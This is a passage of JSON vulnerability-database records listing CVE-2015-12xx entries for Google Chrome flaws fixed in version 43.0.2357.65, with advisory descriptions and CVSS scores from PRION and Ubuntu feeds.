43.0.2357.65, allows remote attackers to bypass the Same Origin Policy via crafted JavaScript code that appends a child to a SCRIPT element, related to the insert and executeReparentTask functions.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1253"], "modified": "2017-01-03T02:59:00", "id": "PRION:CVE-2015-1253", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2015-1253", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T03:45:42", "description": "PDFium, as used in Google Chrome before 43.0.2357.65, does not properly initialize memory, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1259"], "modified": "2017-01-03T02:59:00", "id": "PRION:CVE-2015-1259", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2015-1259", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T03:45:43", "description": "Multiple unspecified vulnerabilities in Google Chrome before 43.0.2357.65 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1265"], "modified": "2017-09-17T01:29:00", "id": "PRION:CVE-2015-1265", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2015-1265", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T03:45:43", "description": "platform/fonts/shaping/HarfBuzzShaper.cpp in Blink, as used in Google Chrome before 43.0.2357.65, does not initialize a certain width field, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted Unicode text.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "prion", "title": "Code injection", "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1262"], "modified": "2017-01-03T02:59:00", "id": "PRION:CVE-2015-1262", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2015-1262", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T03:45:41", "description": "core/dom/Document.cpp in Blink, as used in Google Chrome before 43.0.2357.65, enables the inheritance of the designMode attribute, which allows remote attackers to bypass the Same Origin Policy by leveraging the availability of editing.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1254"], "modified": "2017-01-03T02:59:00", "id": "PRION:CVE-2015-1254", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2015-1254", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-11-22T03:45:41", "description": "Use-after-free vulnerability in content/renderer/media/webaudio_capturer_source.cc in the WebAudio implementation in Google Chrome before 43.0.2357.65 allows remote attackers to cause a denial of service (heap memory corruption) or possibly have unspecified other impact by leveraging improper handling of a stop action for an audio track.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1255"], "modified": "2017-01-03T02:59:00", "id": "PRION:CVE-2015-1255", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2015-1255", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T03:45:42", "description": "Use-after-free vulnerability in the SpeechRecognitionClient implementation in the Speech subsystem in Google Chrome before 43.0.2357.65 allows remote attackers to execute arbitrary code via a crafted document.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1251"], "modified": "2018-10-09T19:55:00", "id": "PRION:CVE-2015-1251", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2015-1251", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T03:45:42", "description": "Cross-site scripting (XSS) vulnerability in Google Chrome before 43.0.2357.65 allows user-assisted remote attackers to inject arbitrary web script or HTML via crafted data that is improperly handled by the Bookmarks feature.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "prion", "title": "Cross site scripting", "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1264"], "modified": "2017-01-03T02:59:00", "id": "PRION:CVE-2015-1264", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2015-1264", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-11-22T03:45:42", "description": "Multiple use-after-free vulnerabilities in content/renderer/media/user_media_client_impl.cc in the WebRTC implementation in Google Chrome before 43.0.2357.65 allow remote attackers to cause a denial of service or possibly have unspecified other impact via crafted JavaScript code that executes upon completion of a getUserMedia request.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "prion", "title": "Server side request forgery (ssrf)", "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1260"], "modified": "2017-01-03T02:59:00", "id": "PRION:CVE-2015-1260", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2015-1260", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T03:45:43", "description": "The Spellcheck API implementation in Google Chrome before 43.0.2357.65 does not use an HTTPS session for downloading a Hunspell dictionary, which allows man-in-the-middle attackers to deliver incorrect spelling suggestions or possibly have unspecified other impact via a crafted file.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1263"], "modified": "2017-01-03T02:59:00", "id": "PRION:CVE-2015-1263", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2015-1263", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-11-22T03:45:41", "description": "common/partial_circular_buffer.cc in Google Chrome before 43.0.2357.65 does not properly handle wraps, which allows remote attackers to bypass a sandbox protection mechanism or cause a denial of service (out-of-bounds write) via vectors that trigger a write operation with a large amount of data, related to the PartialCircularBuffer::Write and PartialCircularBuffer::DoWrite functions.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "prion", "title": "Out-of-bounds", "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1252"], "modified": "2017-01-03T02:59:00", "id": "PRION:CVE-2015-1252", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2015-1252", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T03:45:45", "description": "The Spellcheck API implementation in Google Chrome before 44.0.2403.89 does not use an HTTPS session for downloading a Hunspell dictionary, which allows man-in-the-middle attackers to deliver incorrect spelling suggestions or possibly have unspecified other impact via a crafted file, a related issue to CVE-2015-1263.", "cvss3": {}, "published": "2015-07-23T00:59:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1263", "CVE-2015-1288"], "modified": "2018-10-30T16:27:00", "id": "PRION:CVE-2015-1288", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2015-1288", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2023-12-03T14:59:59", "description": "android/java/src/org/chromium/chrome/browser/WebsiteSettingsPopup.java in\nGoogle Chrome before 43.0.2357.65 on Android does not properly restrict use\nof a URL's fragment identifier during construction of a page-info popup,\nwhich allows remote attackers to spoof the URL bar or deliver misleading\npopup content via crafted text.", "cvss3": {}, "published": "2015-05-20T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1261", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1261"], "modified": "2015-05-20T00:00:00", "id": "UB:CVE-2015-1261", "href": "https://ubuntu.com/security/CVE-2015-1261", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-12-03T14:59:59", "description": "PDFium, as used in Google Chrome before 43.0.2357.65, does not properly\ninitialize memory, which allows remote attackers to cause a denial of\nservice or possibly have unspecified other impact via unknown vectors.", "cvss3": {}, "published": "2015-05-20T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1259", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1259"], "modified": "2015-05-20T00:00:00", "id": "UB:CVE-2015-1259", "href": "https://ubuntu.com/security/CVE-2015-1259", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T15:00:00", "description": "Google Chrome before 43.0.2357.65 relies on libvpx code that was not built\nwith an appropriate --size-limit value, which allows remote attackers to\ntrigger a negative value for a size field, and consequently cause a denial\nof service or possibly have unspecified other impact, via a crafted frame\nsize in VP9 video data.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | build parameter is specific for chrome build\n", "cvss3": {}, "published": "2015-05-20T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1258", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1258"], "modified": "2015-05-20T00:00:00", "id": "UB:CVE-2015-1258", "href": "https://ubuntu.com/security/CVE-2015-1258", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T15:00:00", "description": "platform/graphics/filters/FEColorMatrix.cpp in the SVG implementation in\nBlink, as used in Google Chrome before 43.0.2357.65, does not properly\nhandle an insufficient number of values in an feColorMatrix filter, which\nallows remote attackers to cause a denial of service (container overflow)\nor possibly have unspecified other impact via a crafted document.", "cvss3": {}, "published": "2015-05-20T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1257", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1257"], "modified": "2015-05-20T00:00:00", "id": "UB:CVE-2015-1257", "href": "https://ubuntu.com/security/CVE-2015-1257", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T14:59:59", "description": "Use-after-free vulnerability in the SpeechRecognitionClient implementation\nin the Speech subsystem in Google Chrome before 43.0.2357.65 allows remote\nattackers to execute arbitrary code via a crafted document.", "cvss3": {}, "published": "2015-05-20T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1251", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1251"], "modified": "2015-05-20T00:00:00", "id": "UB:CVE-2015-1251", "href": "https://ubuntu.com/security/CVE-2015-1251", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T14:59:59", "description": "Multiple unspecified vulnerabilities in Google Chrome before 43.0.2357.65\nallow attackers to cause a denial of service or possibly have other impact\nvia unknown vectors.", "cvss3": {}, "published": "2015-05-20T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1265", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1265"], "modified": "2015-05-20T00:00:00", "id": "UB:CVE-2015-1265", "href": "https://ubuntu.com/security/CVE-2015-1265", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T15:00:05", "description": "Multiple use-after-free vulnerabilities in\ncontent/renderer/media/user_media_client_impl.cc in the WebRTC\nimplementation in Google Chrome before 43.0.2357.65 allow remote attackers\nto cause a denial of service or possibly have unspecified other impact via\ncrafted JavaScript code that executes upon completion of a getUserMedia\nrequest.", "cvss3": {}, "published": "2015-05-20T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1260", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1260"], "modified": "2015-05-20T00:00:00", "id": "UB:CVE-2015-1260", "href": "https://ubuntu.com/security/CVE-2015-1260", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T15:00:02", "description": "core/html/parser/HTMLConstructionSite.cpp in the DOM implementation in\nBlink, as used in Google Chrome before 43.0.2357.65, allows remote\nattackers to bypass the Same Origin Policy via crafted JavaScript code that\nappends a child to a SCRIPT element, related to the insert and\nexecuteReparentTask functions.", "cvss3": {}, "published": "2015-05-20T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1253", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1253"], "modified": "2015-05-20T00:00:00", "id": "UB:CVE-2015-1253", "href": "https://ubuntu.com/security/CVE-2015-1253", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T15:00:01", "description": "Use-after-free vulnerability in the SVG implementation in Blink, as used in\nGoogle Chrome before 43.0.2357.65, allows remote attackers to cause a\ndenial of service or possibly have unspecified other impact via a crafted\ndocument that leverages improper handling of a shadow tree for a use\nelement.", "cvss3": {}, "published": "2015-05-20T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1256", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1256"], "modified": "2015-05-20T00:00:00", "id": "UB:CVE-2015-1256", "href": "https://ubuntu.com/security/CVE-2015-1256", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T14:59:59", "description": "platform/fonts/shaping/HarfBuzzShaper.cpp in Blink, as used in Google\nChrome before 43.0.2357.65, does not initialize a certain width field,\nwhich allows remote attackers to cause a denial of service or possibly have\nunspecified other impact via crafted Unicode text.", "cvss3": {}, "published": "2015-05-20T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1262", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1262"], "modified": "2015-05-20T00:00:00", "id": "UB:CVE-2015-1262", "href": "https://ubuntu.com/security/CVE-2015-1262", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T15:00:01", "description": "core/dom/Document.cpp in Blink, as used in Google Chrome before\n43.0.2357.65, enables the inheritance of the designMode attribute, which\nallows remote attackers to bypass the Same Origin Policy by leveraging the\navailability of editing.", "cvss3": {}, "published": "2015-05-20T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1254", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1254"], "modified": "2015-05-20T00:00:00", "id": "UB:CVE-2015-1254", "href": "https://ubuntu.com/security/CVE-2015-1254", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-12-03T15:00:00", "description": "Cross-site scripting (XSS) vulnerability in Google Chrome before\n43.0.2357.65 allows user-assisted remote attackers to inject arbitrary web\nscript or HTML via crafted data that is improperly handled by the Bookmarks\nfeature.", "cvss3": {}, "published": "2015-05-20T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1264", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1264"], "modified": "2015-05-20T00:00:00", "id": "UB:CVE-2015-1264", "href": "https://ubuntu.com/security/CVE-2015-1264", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-12-03T15:00:00", "description": "The Spellcheck API implementation in Google Chrome before 43.0.2357.65 does\nnot use an HTTPS session for downloading a Hunspell dictionary, which\nallows man-in-the-middle attackers to deliver incorrect spelling\nsuggestions or possibly have unspecified other impact via a crafted file.", "cvss3": {}, "published": "2015-05-20T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1263", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1263"], "modified": "2015-05-20T00:00:00", "id": "UB:CVE-2015-1263", "href": "https://ubuntu.com/security/CVE-2015-1263", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-12-03T15:00:03", "description": "Use-after-free vulnerability in\ncontent/renderer/media/webaudio_capturer_source.cc in the WebAudio\nimplementation in Google Chrome before 43.0.2357.65 allows remote attackers\nto cause a denial of service (heap memory corruption) or possibly have\nunspecified other impact by leveraging improper handling of a stop action\nfor an audio track.", "cvss3": {}, "published": "2015-05-20T00:00:00", "type": "ubuntucve", "title": 